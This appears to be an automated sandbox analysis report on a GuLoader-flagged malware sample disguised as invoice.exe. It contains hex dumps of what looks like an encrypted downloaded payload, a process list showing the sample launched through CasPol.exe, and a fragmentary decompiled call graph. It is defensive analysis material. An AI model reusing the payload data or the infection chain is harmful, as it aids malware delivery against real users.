                                          Data Ascii: :jKLql0?l6(1_Z;LZ6{;ulq<biz-v9Apv\>pNFPt"i;FS(Y_WU18;k:&' !WfiFoZvO?j]1A)Ei$Sc^o!1^aNAu;>Ckb{;Y`<{bfqd[~%Kt|Q~
                                          2023-03-17 13:34:27 UTC70INData Raw: c0 29 5f 96 c7 66 d6 b2 bd 6e ff 20 90 33 5a 55 79 00 db 23 74 8b 18 ba c3 88 49 46 c1 c9 cc 66 5b 79 36 51 7d cb 2e 0f 3c 1a 33 62 85 10 a2 3d d4 79 1b 5c 54 5b 40 d4 3b 99 67 93 d3 6d 08 41 00 47 61 fa 35 fb d8 af f1 6f b9 d0 dc 89 61 b0 88 b7 53 98 50 10 5e b5 19 d2 6a 28 b8 c7 8b 5d 36 0e a3 17 b2 57 9c b5 a3 f6 55 c7 85 dd 9f 1d 07 3a 0c b6 39 ff 83 f5 88 76 a1 a4 45 f2 6b 1c 9e f2 0b c1 d6 13 1c 53 99 01 8a 7c b7 a0 3d 98 94 b8 d0 2d 55 46 e8 21 6a ee ac bc b4 b3 62 52 f0 06 ed 35 4b 5c ae ba 20 2d 1e 8e ff 78 ff 55 eb 32 10 63 9c a1 8a 1c d4 55 84 58 43 1d 60 68 bd 9d 9d f4 82 7c d0 67 ff ac a3 55 e4 8a 22 62 72 03 f5 b6 c1 00 ad d7 66 9e ac e2 a3 2b 70 fa bf 8b 41 d2 39 c6 50 54 53 a8 5e 39 bd 8f 81 36 06 74 3a 85 e8 c5 5b e2 62 08 94 d0 7b f9 01
                                          Data Ascii: )_fn 3ZUy#tIFf[y6Q}.<3b=y\T[@;gmAGa5oaSP^j(]6WU:9vEkS|=-UF!jbR5K\ -xU2cUXC`h|gU"brf+pA9PTS^96t:[b{
                                          2023-03-17 13:34:27 UTC71INData Raw: 98 16 b8 12 39 69 d4 9b cf 64 c7 79 b1 af 53 3f c2 d2 28 41 29 86 f8 89 fc fb a9 17 91 69 d0 9f e8 c8 8b c8 dd ad 1b be 5a 5d 70 b2 d5 a4 e2 10 5e ac df cd 3e 5d 89 7d 2e 8a 95 20 44 75 13 e5 91 02 2c 41 2b 83 38 43 d3 7d 66 7b 3b 54 71 f4 a6 95 3a 8e 99 92 3c a4 55 d7 d9 72 72 60 6f 88 db 2e 65 74 c4 74 ad 13 7e 87 8a bc 72 80 fa 3c 13 ab 97 9c 54 74 8b af 97 ef 55 e1 6a ed 86 b3 1c aa bb 9c 93 e5 3d 43 c9 d4 db 15 1c 3f 08 a1 97 56 39 d0 d0 a7 35 0c 95 8b df 1c c6 56 03 55 0b 6a 95 53 c6 4c ff bd 7c fb 58 60 4a 4d ea 40 d8 b8 ab c8 a6 a4 52 3f f4 0d 26 50 c8 48 be f7 e4 8a d7 d1 13 57 3a f9 08 02 55 73 85 a0 bc dc 70 fd 8e 81 e5 bc 80 90 c4 6a 6f 66 85 87 21 3d ca 08 10 95 d4 1d b4 11 2b 3a d4 bd 72 15 0b 8b db c1 dc bc 34 96 f9 13 6f 3e bb ae f5 8b 9a
                                          Data Ascii: 9idyS?(A)iZ]p^>]}. Du,A+8C}f{;Tq:<Urr`o.ett~r<TtUj=C?V95VUjSL|X`JM@R?&PHW:Uspjof!=+:r4o>
                                          2023-03-17 13:34:27 UTC73INData Raw: c5 ee 30 f3 b4 68 a4 b0 c1 a8 51 7f 06 eb 35 f3 50 49 64 31 32 b7 f7 10 38 99 55 4e 27 c7 67 92 4b 4d 23 39 21 85 20 9e 18 b7 6a bc 9b 6d 78 59 60 d3 12 ba 03 4a 56 e5 8a 1e 72 17 9a ec a9 7f 70 7a 3d 07 9e a4 e9 4c 2d 79 f2 54 08 ae a5 38 c6 5e 41 bc a8 5f 3f 75 84 75 3c 07 03 2c e2 66 c5 5a e2 90 0f 7b dc 5e dc d8 e4 8d 71 5f e4 8c 95 f0 2a 80 fc 9b d2 bd 09 08 6c ef 4a 65 21 6d 13 31 fc d5 73 21 14 41 ef b7 31 de 8f 78 92 67 65 9b 9c 0f e7 01 73 73 02 0c ea ab fa 88 21 d4 84 be 08 52 04 94 43 ec 73 4f 01 0f be 6b ee 4a 30 71 6c 97 f5 81 03 50 02 71 3f fc 76 28 e5 80 16 31 a8 8c bd 5d be c1 24 9a 66 5a f6 3b 4d fa 5a 67 36 0e 13 98 31 02 95 b7 b8 a1 fe 8c f5 57 e7 75 2a b1 5e 33 47 cc ec 12 df ce ae f2 36 76 eb ca 30 b5 f7 51 f8 73 c2 cd 5c 5e 15 9a 2f
                                          Data Ascii: 0hQ5PId128UN'gKM#9! jmxY`JVrpz=L-yT8^A_?uu<,fZ{^q_*lJe!m1s!A1xgess!RCsOkJ0qlPq?v(1]$fZ;MZg61Wu*^3G6v0Qs\^/
                                          2023-03-17 13:34:27 UTC74INData Raw: 98 1c f8 c2 16 52 1c 5a 6b 03 43 0b 10 ba 6c e7 a6 a8 bc 4a fb 98 dd 4a 5c ca be e4 fc ca 2a f1 e5 d9 3f 10 30 26 46 c8 4a 82 d2 c5 6e 80 28 98 57 12 c7 08 14 55 1e ad 9f e2 2a 27 88 7a 81 e5 83 80 86 c4 34 4a 70 1d 7b 76 dc 3e 08 10 aa d4 0b b4 55 16 6d a1 46 25 74 f9 8b db fe dc aa 34 6a c8 f8 59 df ec b3 04 8b 9a 49 bd 5a e1 02 26 dd 36 c2 f9 a0 ce 55 15 f5 dd 02 a1 26 2c 77 8b c9 17 db 28 38 93 e1 82 20 12 e4 9b 41 bf 0a 44 e0 d1 ee b9 12 97 2b 33 15 bb ee 19 78 b4 33 92 0a 7c 93 fe e0 60 e4 8b b5 d6 f7 34 d3 7b 64 d7 b2 d8 75 10 f8 a7 5d b5 81 96 a8 fb 23 76 83 f7 ac c2 65 c2 7b 2e 16 ca a8 f3 7d 5b 53 2b 5a a6 e9 78 77 64 3d 2c 93 1a 3e d2 79 bd 5a 39 53 6f c2 15 64 0d d0 06 6d bd 59 fd 50 67 69 96 31 37 4e f7 9f eb d4 b1 8b 67 a6 00 b4 ee 8f 50 f1
                                          Data Ascii: RZkClJJ\*?0&FJn(WU*'z4Jp{v>UmF%t4jYIZ&6U&,w(8 AD+3x3|`4{du]#ve{.}[S+Zxwd=,>yZ9SodmYPgi17NgP
                                          2023-03-17 13:34:27 UTC75INData Raw: 01 99 52 02 0a e2 d0 9a 46 70 d1 8f 21 57 52 10 f0 43 ea 7b 75 06 ce 9e 61 e5 e3 6f 71 6c 97 f5 87 08 1b 02 a4 35 ed b5 9b ba 80 16 31 a8 8a b6 bf fd 0b 0d 98 5e e4 ab 3b 4d fa 5a 61 3d f4 50 56 12 00 d2 70 18 a1 fe 8c f5 51 ec 6b 6a 7b 72 36 63 01 4a 12 97 ef ae f4 3e 5a eb 1f 3a a2 fc 89 53 73 c2 ef 5c 4f 0d 95 25 f1 70 83 8c 59 46 c1 51 11 74 d1 3e 38 2b b9 42 56 29 83 59 ed 5e 2b 57 d8 9f c9 5d e6 82 35 39 0f b5 80 6a a3 82 a3 29 c6 9d a4 9f b0 02 6d 28 27 96 e5 20 df be a9 ab 0b 99 38 18 77 66 69 82 96 10 25 19 17 c7 85 dd 76 5b 5b 81 ae 4e 3f 6a fc 28 b1 0f a5 ea 9a fc 69 88 17 8c 69 24 b1 e8 b3 b9 de cd b9 52 5d 70 5d 6f b2 21 8a e2 3b 67 84 ca d8 bd 74 b0 7c 0d 89 61 1e 5c 7c 08 27 81 1a d4 7e 12 82 1f 40 6b 02 65 51 32 61 64 ee ce 96 7b 8f b2 91
                                          Data Ascii: RFp!WRC{uaoql51^;MZa=PVpQkj{r6cJ>Z:Ss\O%pYFQt>8+BV)Y^+W]59j)m(' 8wfi%v[[N?j(ii$R]p]o!;gt|a\|'~@keQ2ad{
                                          2023-03-17 13:34:27 UTC76INData Raw: e6 24 33 ab 87 05 ff b6 b4 9b b2 0a 30 b7 fe f6 62 47 90 9a d6 29 35 bb d3 77 d7 b2 da 64 82 2c 91 33 b7 5f f1 07 da 23 72 83 73 bf c2 88 fe 44 57 da ca 60 20 7d 90 5b 2b 4b a5 0c 68 0e 65 e2 28 13 84 1a d2 79 bc 4c 40 4a 46 d4 15 84 ae 82 d5 6d bc 59 5e 54 67 fa b8 da 94 bd f7 6f 39 d4 12 99 67 b0 01 b3 65 91 51 10 1a 80 4e c7 6b 28 5f f7 bf 7a 37 0e 0b 3c 58 47 9d b5 bd de 79 cc 84 dd cf 35 bc 27 0d b6 95 c8 70 f1 89 76 fe 8a 07 f9 6d 1c 7f e2 e2 d4 d0 13 d0 58 02 27 8c 7c 0a a6 05 88 92 b8 f9 0c 42 49 ee 21 d2 e8 37 9a b2 b3 aa 59 6c 26 eb 35 f2 56 8a b2 26 2d b7 84 2e 6f f9 55 4d 27 8b 45 98 a1 5b 3c 78 6a 85 78 fc 18 45 5d bc bd 66 e9 29 58 d1 67 be b3 03 52 e5 8a 1f 74 fa 29 f4 b6 7f 06 d9 e2 67 9e a5 e9 97 10 71 da 75 9f f4 f5 38 c6 3c 41 ea 9e 5f
                                          Data Ascii: $30bG)5wd,3_#rsDW` }[+Khe(yL@JFmY^Tgo9geQNk(_z7<XGy5'pvmX'|BI!7Yl&5V&-.oUM'E[<xjxE]f)XgRt)gqu8<A_
                                          2023-03-17 13:34:27 UTC77INData Raw: 9e a0 9d 81 26 26 97 e5 da cd be e6 95 11 1a 0a 19 77 65 69 f1 36 10 33 38 69 2e 9f d9 64 58 53 09 8f 4e 3f 69 ea 4b 62 29 86 ef 89 20 e7 9a 16 8d 69 19 96 e8 c8 8a c8 57 8b 53 8d 62 5c ed 89 21 9c e3 10 b3 80 ce cd bd 74 25 48 0d 8a 60 18 82 50 13 e5 81 02 1b 47 1d 82 4e 43 7f 44 37 7b 9a 54 32 f8 c5 96 b2 8f bb 89 5b 9d 84 d7 d0 69 6e 60 a7 b4 98 34 a9 70 95 4f a4 08 9a 85 6d bc 3f a2 4f 3f d8 ab a6 bb b0 76 8a ae 88 f4 3b db 32 ed bb a8 1c 94 aa 9d 9a fe cf 41 79 ff 85 0f 1b 3a 41 9d 9e 4d dd d2 ef a6 15 30 26 88 d8 1d 53 70 e7 57 4a 6b 8a 48 52 70 e1 bd 43 e0 4c 58 13 4c e3 5b c4 b8 a8 f8 f8 be 6e 3f 79 31 2f 4b c2 48 d9 f6 cf af 64 d2 5c 56 1b dc 30 04 d4 72 9a bb e8 f1 ae fd b1 9a ef 83 11 91 cd 71 73 66 85 a1 7f 27 4d 0f b9 ab dd 06 50 13 8c 3b ab
                                          Data Ascii: &&wei638i.dXSN?iKb) iWSb\!t%H`PGNCD7{T2[in`4pOm?O?v;2Ay:AM0&SpWJkHRpCLXL[n?y1/KHd\V0rqsf'MP;
                                          Data Ascii: C"h$Ll<6y^(_1TMZ5RUj;lqTbiB694p#S>ptFQtPF{(Y^W{o8Uj)& <Zfdu9Z7Nyj(.)F$Sc2o!X^Fa];Q!+k1f;0`{U=d'~nJ9|
                                          2023-03-17 13:34:27 UTC123INData Raw: f0 69 43 b5 8a d6 29 30 b3 aa 64 d7 b6 dc 64 10 20 92 35 a9 5a 94 06 d2 2b 76 87 fe aa da 86 f1 4d 2b c9 c8 69 3a 74 50 53 2d 42 be 02 4b 1c 6d f2 24 1a c1 3e d7 70 a5 42 24 5c 4e dc 1a 84 04 99 cd 75 b3 49 e5 5e 6f e7 bc d2 3e ab f7 6e 31 cc a2 8b 6d b9 18 ae ab 91 41 01 48 9d 75 d8 76 2d 54 e7 fb 57 24 0e 00 35 d1 49 98 bd ac cf 7b d9 81 d5 d3 30 66 28 05 be 92 e8 05 f7 87 7e fd 8c c6 f8 4d 1f 7c ff d9 de d5 0e d6 5c 6e 02 8d 72 00 86 ef 87 97 a5 f9 11 d9 58 eb 3c d6 f5 7e ba 92 b2 a0 41 19 26 e8 2d fd 58 4f b2 06 2e ad 9c 0d 7d e9 4d 48 07 c5 7c 9f b9 54 3b 1b 54 98 5d e3 05 b2 62 bc 9d 70 fb 1c 7e c3 03 bf b3 2b 58 f8 8f 1b 74 1d 0f fc b8 79 06 7b d7 69 9b a4 e8 51 2e 7f fd 77 9d a0 cf 3d db 3a 53 bc af 5d 29 7c fd 60 26 16 04 34 92 16 a9 52 f2 81 7e
                                          Data Ascii: iC)0dd 5Z+vM+i:tPS-BKm$>pB$\NuI^o>n1mAHuv-TW$5I{0f(~M|\nrX<~A&-XO.}MH|T;T]bp~+Xty{iQ.w=:S])|`&4R~
                                          2023-03-17 13:34:27 UTC124INData Raw: 2a 11 76 66 6b 82 16 10 33 39 30 d5 9b 92 29 33 30 fc c0 3d 50 0c 9e 06 17 40 f5 9b e8 91 86 ee 63 e8 00 4b 89 ad ac e2 bc a3 df 20 a3 30 39 1b c6 48 f2 85 63 1a c9 bd a4 db 1a d5 0e 23 d9 04 6c 30 1c 7d 82 f3 51 bc 10 75 ee 7a 05 02 28 03 3c 5e 3a 05 86 ae e2 14 fd ba a3 8b b0 65 f9 ea 5c 54 60 7e a4 90 2f 41 39 05 61 fe 76 0a f3 f5 d2 51 ca ab 3d 27 8b ae a1 45 f4 5a a7 80 ef df d9 3b ec b2 b3 f4 97 bb 9b d8 b5 7b 2f 0f 99 df 14 2a 2d 61 9c 9a 05 5a a2 aa c8 7b 5f ab e7 8c 6e 28 19 03 55 1a 6b 83 5f a4 19 d8 ce 2f 8b ec 34 27 28 98 32 ce b8 c5 f8 f1 a2 07 53 60 42 63 00 bb 48 a8 fc c7 b4 86 bb 69 1b 46 8e 65 02 55 7e 92 a0 ea a5 77 af eb e4 8b e7 f3 90 c4 73 78 66 08 f5 18 6c 8e 67 64 cf b7 69 dd 7e 53 6e f2 c9 76 71 53 ef a8 fe dc ac 35 96 e4 43 2b 6e
                                          Data Ascii: *vfk390)30=P@cK 09Hc#l0}Quz(<^:e\T`~/A9avQ='EZ;{/*-aZ{_n(Uk_/4'(2S`BcHiFeU~wsxflgdi~SnvqS5C+n
                                          2023-03-17 13:34:27 UTC125INData Raw: 93 a4 fb 0b df 58 eb 2f ce ed 7e 9e b2 a1 29 a0 3a 01 fa 37 f1 44 c0 47 3b 28 a7 05 75 6a 78 44 4c 35 45 60 87 a4 48 bd be 47 07 5d fc 0a 36 7b be 93 6b fb c0 6e c1 67 bd af 36 44 fc 84 03 68 02 0f e9 a4 64 1b 78 d2 47 9d a5 f4 49 23 79 fc 57 9e af c0 ba cb 3a 61 bc ba dd 28 68 ad 6e 24 85 61 24 a2 04 c4 48 63 f5 00 75 d8 6f eb 58 8e 8c 93 bc fd 89 b5 f1 2a 93 b8 bb fc be 7b 06 52 ac 4b 64 33 ef 33 37 1c dc 46 31 ed 40 1d d3 3d d0 81 76 91 76 8b af 84 8d b2 13 1b 7f 13 8e db ba 1e ae 61 5a a7 ac f6 7f 02 71 52 e9 53 4f 12 85 a8 6e c4 4a 5e f3 55 90 f5 85 0e 5e 0a 67 38 e2 94 29 8b 02 57 34 88 8c af df c9 c7 2e 91 5e 50 80 33 4d fb 48 e5 18 1c d7 de 1d 2b d0 b4 2a 23 b7 9d 77 1e f5 f7 49 b4 71 3b 70 4c 24 1c b4 e8 a1 f0 24 f7 10 cf 3c bc 7c 34 62 f2 d3 ed
                                          Data Ascii: X/~):7DG;(ujxDL5E`HG]6{kng6DhdxGI#yW:a(hn$a$HcuoX*{RKd337F1@=vvaZqRSOnJ^U^g8)W4.^P3MH+*#wIq;pL$$<|4b
                                          2023-03-17 13:34:27 UTC127INData Raw: 86 56 31 cc da b5 05 25 df 96 f4 12 47 79 1a 48 09 68 87 53 e6 7d b4 ba 4a f9 84 41 58 54 fa 40 c6 b9 d5 eb e8 ab 79 23 0d 3e 3b 42 d1 4a aa fd c1 bc 8e de 2b 59 1a c9 0a 00 51 53 92 a3 ea ed 20 f0 a4 93 64 36 9d 95 d9 6f 64 63 0e 22 ab 21 f9 15 15 b8 55 a4 a9 14 33 28 23 8b 2f 14 3e 8a c9 7f 61 ae b5 2b e7 15 79 00 ed be 41 6a a3 4e a7 42 ef 07 a5 0b 24 9e 14 e6 84 b8 07 77 30 06 23 fc 0a 46 85 19 19 92 e1 2a 11 50 90 b4 e3 26 a5 fc 0e c6 c6 79 03 fc 3b a3 85 bf c2 a9 97 87 a8 b4 36 6a b1 18 fd 82 f8 d6 61 55 37 67 d8 30 33 b6 b8 e6 3e bc da 76 92 cd 83 b1 59 4d 14 ed d2 2b 7e 8b ff a6 d0 09 ee 42 0e c8 d8 e2 d7 75 01 54 11 45 ba 0e 5e 11 6d ea 24 0f da 27 dc 64 a1 51 25 44 48 c9 06 9d 10 92 c9 63 a1 4b e4 48 7a e6 a4 c6 2a a1 ea 7d 21 c8 bf 97 75 a9 0e
                                          Data Ascii: V1%GyHhS}JAXT@y#>;BJ+YQS d6odc"!U3(#/>a+yAjNB$w0#F*P&y;6jaU7g03>vYM+~BuTE^m$'dQ%DHcKHz*}!u
                                          2023-03-17 13:34:27 UTC128INData Raw: 09 8a 96 0f 9b 01 99 52 02 0c ea ab 9c 8b 73 d8 8e be 76 52 00 f0 43 ec 53 4f 00 87 85 6b e4 4a 1c 71 6c 17 f5 81 00 50 04 69 36 e7 b4 29 99 80 16 31 a9 8c bf 5d f8 c2 36 93 5f d8 88 3b 4d fa 5a 67 35 0e 55 9b 11 0b d3 b5 3a a1 fe 8c f5 57 64 75 6c b2 71 3a 62 ce 69 12 97 ef ae f2 36 76 ed d2 38 ae fc 51 70 73 aa ef 5c de 15 9a 3e ce 70 8e 8d 59 46 c1 51 91 74 c7 1f 7d 02 be 46 5b b8 83 59 ed fe 8b 55 ce 13 a3 7b ea 86 3b 38 27 bb 81 6a a3 ce 96 2b b2 f1 ba 9b a0 03 8d 26 26 96 e5 20 c9 12 e5 a3 11 9d 2a 4f 77 35 69 dd 16 46 33 7c 69 86 9b 8a 64 13 53 c1 af 00 3f 35 ea 61 41 67 86 a8 89 b2 d5 9a 16 8c 69 99 a3 07 36 8b c8 cd ad 53 8d 62 5c 6f b2 21 9c e2 10 5f ac ce cd bc 74 8f 7c 0d 8a 61 18 44 75 17 e5 80 02 d4 7e 12 82 1f 43 6b 44 66 7b 3b 54 60 f4 cf
                                          Data Ascii: RsvRCSOkJqlPi6)1]6_;MZg5U:Wdulq:bi6v8Qps\>pYFQt}F[YU{;8'j+&& *Ow5iF3|idS?5aAgi6Sb\o!_t|aDu~CkDf{;T`
                                          2023-03-17 13:34:27 UTC129INData Raw: a6 31 c0 89 3c a7 1f 13 c5 e4 68 7c 9b 96 d6 ca 4b 0c e3 92 9f 03 26 c1 e3 b9 47 1a da da 14 f5 9d e6 69 1a 00 b1 0f c0 2d e3 73 ae 6a 18 e5 98 9a ba e5 93 2a 5d f4 e8 15 50 13 61 20 48 23 c3 61 37 6a 48 8f 45 70 ba 51 a1 16 db 38 14 3a 29 b9 2e e5 7e fd fb 1b 8f 7b c3 4b 6d da 99 fa 17 93 84 0a 5b a1 c3 e2 13 c9 3e be a4
                                          Data Ascii: 1<h|K&Gi-sj*]Pa H#a7jHEpQ8:).~{Km[>
                                          2023-03-17 13:34:27 UTC129INData Raw: b9 71 30 38 a0 50 ec 19 4d 2d 82 96 2d 43 6b 6e 6c bb 3d eb dc d0 bb 4c a1 f7 fd b6 58 02 56 7e 8b b5 bd 75 98 b3 05 9c e2 a9 9c 0c 6f 50 8f b5 a0 a2 7c a0 37 28 77 a1 1f 61 cb d0 fb e1 d5 d2 7a ef 67 d0 2c d9 c8 5b 9e 92 93 88 79 3f 3a ca 18 de 76 14 fb 65 0d f8 e5 7e 11 9f 30 3d 53 e7 2e ea d5 33 53 55 26 88 52 de 38 97 4a 9c bd 45 c9 61 5f f1 47 9a fa 4c 76 9c e5 6b 54 68 60 9a c2 5d 72 15 f5 04 f6 c5 87 2b 4e 51 8e 1f fa 8e 85 51 a8 5b 2e cb db 7f 6c 1e e8 1c 16 46 17 4f ed 72 ab 2e c2 d3 61 15 a4 08 96 b6 b3 e1 e4 48 81 e0 b5 82 4e f0 d4 de 9f da 53 7c 3c e9 6a 68 2b 4d 32 11 1c fd 67 03 4f 61 23 f4 11 fe fd 1d e2 12 6c f9 e2 6a ff 44 e1 37 61 79 9e c2 f3 e5 3f bd f8 db 18 72 7e 9f 27 89 53 38 69 73 f5 4b 8b 24 29 51 03 f1 d5 f5 68 35 24 0f 59 8b d8
                                          Data Ascii: q08PM--Cknl=LXV~uoP|7(wazg,[y?:ve~0=S.3SU&R8JEa_GLvkTh`]r+NQQ[.lFOr.aHNS|<jh+M2gOa#ljD7ay?r~'S8isK$)Qh5$Y
                                          2023-03-17 13:34:27 UTC130INData Raw: a2 9f ac b1 94 75 f7 f9 52 44 40 42 95 bc 02 76 07 09 3f dd 7c 0c f3 f9 d8 79 ea 8b 74 45 96 8d db 31 46 bb 9e b0 db ea ee 16 dd 87 87 ce bb 8f af f0 d0 06 22 55 98 e9 39 1a 0f 58 f8 f2 33 5c e3 a2 94 7a 1b bf a8 c9 33 64 46 2e 6b 06 60 8e 59 c7 55 88 9c 6a db a4 7c 67 60 ca 17 a7 d6 ad 96 86 d6 44 08 30 1d 0b 6e c5 42 88 d7 e6 94 a0 f0 19 76 3f ea 34 71 20 03 e3 cf 90 85 42 98 f7 d2 c5 ca e4 ad e6 11 4a 53 2d 93 4e 5e c5 69 3d 9f b0 24 82 3c 09 5c c0 fe 08 2c 58 b9 bf d3 bd 8e 00 a2 df 21 6b 34 8a 96 f0 ea e7 6b 9d 63 df 38 0a dc 3b 16 f4 fe 26 75 35 d5 fd 34 9d 30 29 65 ab 40 7e e1 80 57 e4 92 a2 0e 32 09 9a 40 b2 de 64 a8 21 ce 99 32 ab 1c 1e 86 b9 76 6c d6 c4 f4 c1 7e 19 f7 b1 a5 40 0e d1 b7 f4 52 00 da 98 02 e5 8a bd 57 3d 15 a2 51 8d 72 a2 34 ee 12
                                          Data Ascii: uRD@Bv?|ytE1F"U9X3\z3dF.k`YUj|g`D0nBv?4q BJS-N^i=$<\,X!k4kc8;&u540)e@~W2@d!2vl~@RW=Qr4
                                          2023-03-17 13:34:27 UTC132INData Raw: 9c c9 31 5d 4d e9 07 57 6b 1b 4b f1 27 ed 0d 8b fe 6a 14 a7 09 d9 82 c3 ad e0 50 80 ac f9 91 5f e5 ca 96 dc 92 5e 36 59 86 6a 45 1d 4c 3f 1c 31 d7 67 03 53 25 66 a4 54 b0 eb 1d fd 04 70 b4 9b 05 bb 21 b9 72 3e 68 8f db f9 e5 17 bd e0 ca 35 21 63 95 2e 8e 1f 36 3e 0a 97 4b c4 6a 6c 51 4c ab 94 f2 73 35 69 0b 5a 9e fd 4d fc ee 62 58 dc f5 b3 57 d8 e2 2e b3 7f 78 a8 1b 6d da 2e 1e 45 6b 68 b9 66 62 bd 86 09 83 f3 86 d5 77 c4 55 4c 92 51 1a 42 ee 07 73 fa 8a 93 d0 7b 1f 8e a0 56 dd 92 37 04 5d 95 86 32 3a 7a ed 4d e0 33 e1 e0 34 29 af 7c d2 1b a9 6a 0f 6d d2 35 79 25 89 79 cd 7e 8b 77 ee 9f 80 5b ca f0 5e 4a 54 d2 ee 04 9e a0 84 07 82 84 86 b5 90 21 80 2c 06 b6 c5 00 e9 9e c6 b7 31 bd 5a 6b 18 05 0c f1 65 7f 41 78 1b b7 f3 b0 10 3f 30 fa da 3c 5a 57 c8 02 63
                                          Data Ascii: 1]MWkK'jP_^6YjEL?1gS%fTp!r>h5!c.6>KjlQLs5iZMbXW.xm.EkhfbwULQBs{V7]2:zM34)|jm5y%y~w[^JT!,1ZkeAx?0<ZWc
                                          2023-03-17 13:34:27 UTC133INData Raw: 3d 3a a2 9a 25 14 3d 8b
                                          Data Ascii: =:%=



                                          Target ID:1
                                          Start time:14:32:12
                                          Start date:17/03/2023
                                          Path:C:\Users\user\Desktop\invoice.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\invoice.exe
                                          Imagebase:0x400000
                                          File size:861416 bytes
                                          MD5 hash:F111934675C34CCA18D9D76FC34A2E40
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.8704170676.000000000666B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low

                                          Target ID:5
                                          Start time:14:34:15
                                          Start date:17/03/2023
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\invoice.exe
                                          Imagebase:0xb20000
                                          File size:108664 bytes
                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          Target ID:6
                                          Start time:14:34:15
                                          Start date:17/03/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d18e0000
                                          File size:875008 bytes
                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:9
                                          Start time:14:34:34
                                          Start date:17/03/2023
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2544
                                          Imagebase:0x3f0000
                                          File size:482640 bytes
                                          MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:moderate


                                            Execution Graph

                                            Execution Coverage:22.8%
                                            Dynamic/Decrypted Code Coverage:14.2%
                                            Signature Coverage:21.4%
                                            Total number of Nodes:1480
                                            Total number of Limit Nodes:46
calls 4175->4178 4176->4172 4181 4038a4 lstrlenA 4176->4181 4185 405928 CharNextA 4176->4185 4179 4039a1 4177->4179 4180 403922 RegisterClassA 4177->4180 4178->4177 4184 40140b 2 API calls 4179->4184 4182 4039ab 4180->4182 4183 403958 SystemParametersInfoA CreateWindowExA 4180->4183 4186 4038b2 lstrcmpiA 4181->4186 4187 4038d8 4181->4187 4182->4103 4183->4179 4188 4039a7 4184->4188 4190 4038a2 4185->4190 4186->4187 4191 4038c2 GetFileAttributesA 4186->4191 4189 4058fd 3 API calls 4187->4189 4188->4182 4192 403a7a 18 API calls 4188->4192 4193 4038de 4189->4193 4190->4181 4194 4038ce 4191->4194 4195 4039b8 4192->4195 4300 405f65 lstrcpynA 4193->4300 4194->4187 4197 405944 2 API calls 4194->4197 4198 4039c4 ShowWindow 4195->4198 4199 403a47 4195->4199 4197->4187 4201 40628f 3 API calls 4198->4201 4200 40515e 5 API calls 4199->4200 4202 403a4d 4200->4202 4204 4039dc 4201->4204 4203 403a69 4202->4203 4206 403a51 4202->4206 4207 40140b 2 API calls 4203->4207 4205 4039ea GetClassInfoA 4204->4205 4208 40628f 3 API calls 4204->4208 4209 403a14 DialogBoxParamA 4205->4209 4210 4039fe GetClassInfoA RegisterClassA 4205->4210 4206->4182 4211 40140b 2 API calls 4206->4211 4207->4182 4208->4205 4212 40140b 2 API calls 4209->4212 4210->4209 4211->4182 4212->4182 4213->4039 4305 405f65 lstrcpynA 4214->4305 4216 4059fc 4306 405996 CharNextA CharNextA 4216->4306 4219 4034df 4219->4103 4228 405f65 lstrcpynA 4219->4228 4220 4061cf 5 API calls 4226 405a12 4220->4226 4221 405a3d lstrlenA 4222 405a48 4221->4222 4221->4226 4224 4058fd 3 API calls 4222->4224 4225 405a4d GetFileAttributesA 4224->4225 4225->4219 4226->4219 4226->4221 4227 405944 2 API calls 4226->4227 4312 406268 FindFirstFileA 4226->4312 4227->4221 4228->4084 4229->4090 4231 4036f3 4230->4231 4232 4036e5 CloseHandle 4230->4232 4315 403720 4231->4315 4232->4231 4238 405696 4237->4238 4239 4056aa MessageBoxIndirectA 4238->4239 4240 403531 ExitProcess 4238->4240 4239->4240 4242 4062fd 5 API calls 4241->4242 4243 40353e lstrcatA 
4242->4243 4243->4077 4243->4078 4245 4055a3 GetLastError 4244->4245 4246 403580 4244->4246 4245->4246 4247 4055b2 SetFileSecurityA 4245->4247 4246->4092 4247->4246 4248 4055c8 GetLastError 4247->4248 4248->4246 4250 4055e3 GetLastError 4249->4250 4251 4055df 4249->4251 4250->4251 4251->4092 4252->4093 4253->4105 4255 405d65 4254->4255 4256 405d58 4254->4256 4255->4105 4372 405bd4 4256->4372 4259 405643 4258->4259 4260 405637 CloseHandle 4258->4260 4259->4105 4260->4259 4262 401389 2 API calls 4261->4262 4263 401420 4262->4263 4263->4062 4265 4031de 4264->4265 4266 405917 lstrcatA 4264->4266 4265->4125 4266->4265 4267->4131 4268->4133 4270 405951 4269->4270 4271 402db4 4270->4271 4272 405956 CharPrevA 4270->4272 4273 405f65 lstrcpynA 4271->4273 4272->4270 4272->4271 4273->4137 4275 402d05 4274->4275 4276 402ced 4274->4276 4279 402d15 GetTickCount 4275->4279 4280 402d0d 4275->4280 4277 402cf6 DestroyWindow 4276->4277 4278 402cfd 4276->4278 4277->4278 4278->4140 4282 402d23 CreateDialogParamA ShowWindow 4279->4282 4283 402d46 4279->4283 4287 406339 4280->4287 4282->4283 4283->4140 4285->4146 4286->4148 4288 406356 PeekMessageA 4287->4288 4289 402d13 4288->4289 4290 40634c DispatchMessageA 4288->4290 4289->4140 4290->4288 4292 403a8e 4291->4292 4301 405ec3 wsprintfA 4292->4301 4294 403aff 4302 403b33 4294->4302 4296 40383a 4296->4170 4297 403b04 4297->4296 4298 